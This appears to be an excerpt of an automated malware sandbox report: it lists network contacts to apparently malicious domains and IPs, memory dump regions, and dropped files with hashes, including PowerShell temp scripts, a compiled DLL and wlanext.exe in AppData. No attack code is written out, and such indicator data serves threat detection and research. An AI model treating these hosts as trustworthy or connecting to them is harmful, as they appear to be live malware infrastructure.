US 8.8.8.8:53 32.84.32.84.in-addr.arpa udp
LT 84.32.84.32:80 www.fichier-nt-pdf.store tcp
LT 84.32.84.32:80 www.fichier-nt-pdf.store tcp
LT 84.32.84.32:80 www.fichier-nt-pdf.store tcp
LT 84.32.84.32:80 www.fichier-nt-pdf.store tcp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 www.princos.info udp
US 203.161.46.205:80 www.princos.info tcp
US 8.8.8.8:53 205.46.161.203.in-addr.arpa udp
US 203.161.46.205:80 www.princos.info tcp
US 203.161.46.205:80 www.princos.info tcp
US 203.161.46.205:80 www.princos.info tcp
US 203.161.46.205:80 www.princos.info tcp
US 8.8.8.8:53 www.betmatchx.online udp
UA 91.206.201.136:80 www.betmatchx.online tcp
US 8.8.8.8:53 136.201.206.91.in-addr.arpa udp
UA 91.206.201.136:80 www.betmatchx.online tcp
UA 91.206.201.136:80 www.betmatchx.online tcp
UA 91.206.201.136:80 www.betmatchx.online tcp
UA 91.206.201.136:80 www.betmatchx.online tcp
US 8.8.8.8:53 www.matteicapital.online udp
US 208.91.197.27:80 www.matteicapital.online tcp
US 8.8.8.8:53 27.197.91.208.in-addr.arpa udp
US 208.91.197.27:80 www.matteicapital.online tcp
US 208.91.197.27:80 www.matteicapital.online tcp
US 208.91.197.27:80 www.matteicapital.online tcp
US 208.91.197.27:80 www.matteicapital.online tcp
US 8.8.8.8:53 www.prestigerugz.info udp
DE 217.160.0.113:80 www.prestigerugz.info tcp
US 8.8.8.8:53 113.0.160.217.in-addr.arpa udp
DE 217.160.0.113:80 www.prestigerugz.info tcp
DE 217.160.0.113:80 www.prestigerugz.info tcp
US 8.8.8.8:53 udp

Files

memory/860-0-0x0000000070EEE000-0x0000000070EEF000-memory.dmp

memory/860-1-0x00000000027C0000-0x00000000027F6000-memory.dmp

memory/860-3-0x0000000005340000-0x0000000005968000-memory.dmp

memory/860-2-0x0000000070EE0000-0x0000000071690000-memory.dmp

memory/860-4-0x0000000005170000-0x0000000005192000-memory.dmp

memory/860-6-0x0000000005AE0000-0x0000000005B46000-memory.dmp

memory/860-5-0x0000000005290000-0x00000000052F6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4emfy4h5.qmu.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/860-16-0x0000000005B50000-0x0000000005EA4000-memory.dmp

memory/860-17-0x0000000006100000-0x000000000611E000-memory.dmp

memory/860-18-0x0000000006120000-0x000000000616C000-memory.dmp

memory/1632-29-0x000000006D7A0000-0x000000006D7EC000-memory.dmp

memory/1632-28-0x0000000006300000-0x0000000006332000-memory.dmp

memory/1632-39-0x0000000006EF0000-0x0000000006F0E000-memory.dmp

memory/1632-40-0x0000000006F30000-0x0000000006FD3000-memory.dmp

memory/1632-41-0x00000000076A0000-0x0000000007D1A000-memory.dmp

memory/1632-42-0x0000000007060000-0x000000000707A000-memory.dmp

memory/1632-43-0x00000000070C0000-0x00000000070CA000-memory.dmp

memory/1632-44-0x00000000072F0000-0x0000000007386000-memory.dmp

memory/1632-45-0x0000000007260000-0x0000000007271000-memory.dmp

memory/1632-46-0x0000000007290000-0x000000000729E000-memory.dmp

memory/1632-47-0x00000000072A0000-0x00000000072B4000-memory.dmp

memory/1632-48-0x00000000073B0000-0x00000000073CA000-memory.dmp

memory/1632-49-0x00000000072E0000-0x00000000072E8000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\lzzzoozl\lzzzoozl.cmdline

MD5 744bf541171f1e1bbaa2092eb9dac51e
SHA1 2721a9e3fa7254d57001fb0381c63afffb5f40f6
SHA256 93ccc5b8f167de57da742d2026c1c68e2ab921aa60b38f4ff720cf5ff302f23c
SHA512 f89c331ec2ee7b3babd31607ee4281c944b8b33d7789aa0e473281596494a40eed0760dac271ba44cd9033fb8afb8f0a299e48ef7f2b9bca6b241f474e19ce1d

\??\c:\Users\Admin\AppData\Local\Temp\lzzzoozl\lzzzoozl.0.cs

MD5 4af98cbe7b888e1e92e1aa8a35732223
SHA1 75d54c91355c97fc9b1c3453efea5dccd817ed42
SHA256 596b94a3cb934e9261ddf50733d26c0147c5cb57e1215cabed32fee719782f34
SHA512 1127001fd6eb53db939188df14cdd466f44103d8386e51ffaeaaa56569e137367388097c37422fbe332f6b7ced9f4959058f1235f106efcc03e492e009705ff3

\??\c:\Users\Admin\AppData\Local\Temp\lzzzoozl\CSC5E4A05AEE662450799A3E9EDCFB70B1.TMP

MD5 be33b43dc0a0d0ee9e8d8611ff12d29e
SHA1 79e45ab90c76582617857f1eda0694fce579c0f1
SHA256 a062ff40d8dc0c461ae2fdd134811b9c73ac332899b6fbb7eb42ffcf2e8a0cdd
SHA512 cff8adfedb156940b0bd49bd0fb918dd38884bc611feab5d70aa20d100495802a2649b4726e85669246b864c2ea529646e6ce35677913b5d7c78611267a3fc99

C:\Users\Admin\AppData\Local\Temp\RESCDEF.tmp

MD5 f4716bfe1bd302f1b918187fa8b23a63
SHA1 738656598aad26b102a02ed4faaafce1c8233c9b
SHA256 8633ce07fce1d7b0738c0b6db11893322d0e4d6e77438a2be19f117836efdad7
SHA512 092fb24eff474672bf06a82589df913807e8e40bc4ab366a957540b6dba1683f42e61104a2d3ed10d1967040bad26c7d67b2c7906e6b57ef112966eaa759d37b

C:\Users\Admin\AppData\Local\Temp\lzzzoozl\lzzzoozl.dll

MD5 e17a0872ce502543e77128998863fa8b
SHA1 3a0c88f8827eb9966c24cffbdc54174ac64c1f3c
SHA256 601d211643c9c809c9c0264cee2a1687627c4f1a4ef8890f08fa73cf24bd0db8
SHA512 77139ac6c8c6d31f2377282e86100dc3d0e9078242c7b6eb81517fd7be57490919e3c58a5c52aed982c314d0f144ad20e9e74f683b929b74e000398793f52aae

memory/860-64-0x00000000066C0000-0x00000000066C8000-memory.dmp

memory/860-70-0x0000000070EEE000-0x0000000070EEF000-memory.dmp

memory/860-71-0x0000000070EE0000-0x0000000071690000-memory.dmp

memory/860-72-0x00000000074D0000-0x00000000074F2000-memory.dmp

memory/860-73-0x0000000008560000-0x0000000008B04000-memory.dmp

C:\Users\Admin\AppData\Roaming\wlanext.exe

MD5 7423e3013a2ca93513e9f1024dfe1cc8
SHA1 525281537f75c168ca4015df438bb83a7784931a
SHA256 8e3951372f996dd248695a54af7ff1a5cde1059689aa43d953712e6c0744c0df
SHA512 d5189a52b0cb9db2da33b7d8a61278e5e8edf0d1f075695dc5e99178e47b319658f8cf3e8339ee8bf24c548b3a38c01265250edf173f368dbea062ada78baea0

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\POwersHeLl.ExE.log

MD5 968cb9309758126772781b83adb8a28f
SHA1 8da30e71accf186b2ba11da1797cf67f8f78b47c
SHA256 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA512 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c5f8dfb461b6247744a34510486518a8
SHA1 c7867fc3ce3027fbec8bed02f2d2ecb3f9daf5bd
SHA256 5090beccaeebcc44cd6efe04b0948c62130fe755597ef8a417a5eb5f4d731fb0
SHA512 c46fdf496fc842b4ab25491b3cc0a20f73c68cf3167a27bf0457ab5036878614fe40bb86dc94d1fb3d094f0c6a38a45034a93102a24c88d920e33f8e8b4ace9f

memory/860-87-0x0000000070EE0000-0x0000000071690000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\autE0CB.tmp

MD5 5fc0e7bec89d9a4e021d88dd1cf731b2
SHA1 26ea02938cb1eb51a1ac601ab1b068a130cc3719
SHA256 532d407f3bdbd28145b385a4e15c80117e07e89f2ba16f1f620fe20cf213783d
SHA512 1c54091984fb41f43dbf7c7676184482ca853fb33e41780a323aec0ca21759e2a91af3bff30a947579811882d1c710a138e7e57dea2d9790e5092e68b768664f

memory/4744-101-0x0000000000400000-0x0000000000447000-memory.dmp

memory/2060-102-0x0000000000D50000-0x0000000000D94000-memory.dmp

memory/2060-103-0x0000000000D50000-0x0000000000D94000-memory.dmp

memory/4368-104-0x00000000050E0000-0x00000000051B1000-memory.dmp

memory/1380-111-0x000001CC5D280000-0x000001CC5D39F000-memory.dmp